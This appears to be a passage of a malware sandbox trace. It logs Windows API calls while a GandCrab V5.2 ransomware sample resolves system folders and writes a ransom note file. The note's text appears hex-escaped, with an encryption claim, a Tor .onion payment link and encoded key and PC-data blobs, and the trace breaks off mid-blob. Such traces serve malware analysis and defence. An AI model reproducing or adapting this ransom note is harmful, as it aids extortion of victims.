0x1e70000 [0096.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.161] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.161] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.161] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.161] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.161] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.161] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.162] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.162] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\\\TITWMVJL-DECRYPT.txt") returned 78 [0096.162] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Sidebar\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows sidebar\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0096.163] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\